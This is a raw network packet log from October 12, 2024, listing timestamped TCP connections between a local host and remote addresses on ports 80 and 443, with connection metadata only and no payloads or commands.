Oct 12, 2024 16:39:44.023616076 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.023730993 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.023761988 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.023796082 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.023829937 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.024833918 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.127790928 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.127851963 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.127852917 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.127902031 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.127902985 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.127939939 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.127964973 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.127974033 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128011942 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128034115 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128211975 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128245115 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128274918 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128302097 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128304958 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128335953 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128355026 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128372908 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.128392935 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128423929 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.128968954 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129020929 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129021883 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129057884 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129076004 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129092932 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129120111 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129126072 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129142046 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129183054 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129904985 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129956961 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.129957914 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.129991055 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130012035 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130023956 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130053997 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130058050 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130074978 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130119085 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130650997 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130701065 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130724907 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130736113 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130750895 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130770922 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.130791903 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.130822897 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.132836103 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.132896900 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221024036 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221086025 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221090078 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221138000 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221144915 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221191883 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221194029 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221235991 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221246958 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221288919 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221293926 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221348047 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221350908 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221388102 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221407890 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221420050 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221440077 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221455097 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221470118 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221489906 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221507072 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221524954 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221541882 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221560955 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221576929 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221604109 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221612930 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221657038 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221678972 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221692085 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221707106 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221743107 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221786022 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221786022 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221796036 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221848011 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221849918 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221885920 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221904993 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221919060 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221941948 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221954107 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.221981049 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.221988916 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222002029 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222026110 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222042084 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222060919 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222081900 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222095966 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222121000 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222158909 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222197056 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222251892 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222264051 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222299099 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222327948 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222347021 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222354889 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222388983 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222410917 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222434998 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222440958 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222475052 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222496033 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222508907 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222526073 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222544909 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.222564936 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.222594976 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.399499893 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.404428959 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.404463053 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.404498100 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.404505968 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.404527903 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:44.404530048 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.404551029 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:44.404580116 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:45.117633104 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.117721081 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.117809057 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.121119022 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.121156931 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.621556997 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.621855021 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.625889063 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.625920057 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.626189947 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.626254082 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.740967989 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.783432961 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.920516968 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.920828104 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.920901060 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.921030998 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.924757957 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.924823046 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:45.924875021 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:45.924895048 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.244152069 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.244175911 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.244235039 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.244637012 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.244663000 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.719238043 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.719506025 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.722852945 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.722867012 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.723571062 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.725755930 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.771413088 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.908613920 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.908772945 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:46.908885002 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.908885956 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.908951998 CEST	49164	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:46.908970118 CEST	443	49164	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:49.006298065 CEST	80	49162	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:49.006387949 CEST	49162	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:51.443232059 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:51.443276882 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:51.443336964 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:51.443950891 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:51.443964005 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:51.949088097 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:51.949265003 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:51.954855919 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:51.954871893 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:51.955249071 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:51.972737074 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:52.019407034 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:52.146636009 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:52.146878004 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:52.146943092 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:52.147572994 CEST	49165	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:52.147591114 CEST	443	49165	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:52.379326105 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.379431963 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:52.379508972 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.379910946 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.379964113 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:52.853226900 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:52.853312016 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.857485056 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.857516050 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:52.857820988 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:52.858675957 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:52.903403044 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.058864117 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.058959961 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.059067965 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.059953928 CEST	49166	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.059994936 CEST	443	49166	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.071619034 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.071660995 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.071742058 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.071906090 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.071918964 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.568077087 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.568535089 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.568545103 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.569436073 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.569439888 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.790946007 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.791091919 CEST	443	49167	188.114.96.3	192.168.2.22
Oct 12, 2024 16:39:53.791203976 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.791225910 CEST	49167	443	192.168.2.22	188.114.96.3
Oct 12, 2024 16:39:53.882915974 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:53.882965088 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:53.883034945 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:53.883460999 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:53.883479118 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.357567072 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.357649088 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.359674931 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.359682083 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.361552000 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.361557961 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546329975 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546396971 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546408892 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546466112 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546473980 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546518087 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546533108 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546546936 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546546936 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546560049 CEST	443	49168	188.114.97.3	192.168.2.22
Oct 12, 2024 16:39:54.546592951 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.546614885 CEST	49168	443	192.168.2.22	188.114.97.3
Oct 12, 2024 16:39:54.549242973 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:54.554183006 CEST	80	49169	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:54.554258108 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:54.554368973 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:54.559195995 CEST	80	49169	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:55.030874014 CEST	80	49169	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:55.030970097 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.300668001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.306727886 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.306778908 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.306967020 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.311697960 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811646938 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811671972 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811687946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811702967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811717987 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811732054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811747074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811762094 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811778069 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811793089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.811913013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.811913013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.817090034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.817106962 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.817115068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.817138910 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.817147017 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.823183060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.823249102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.900981903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901017904 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901032925 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901036024 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901058912 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901076078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901262999 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901284933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901300907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901310921 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901316881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901319981 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901334047 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901335001 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.901355028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.901367903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902156115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.902199030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902210951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.902226925 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.902249098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902264118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902266026 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.902281046 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.902307987 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902318001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.902980089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903021097 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903031111 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.903038025 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903064013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.903064013 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.903068066 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903084040 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903110027 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.903126001 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.903975010 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.903997898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.904015064 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.904025078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.904030085 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.904032946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.904047012 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.904047966 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.904067039 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.904086113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.905812025 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.905859947 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.958209991 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.958224058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.958266020 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:56.990483046 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990499020 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990515947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:56.990530014 CEST	80	49170	104.168.7.25	192.168.2.22
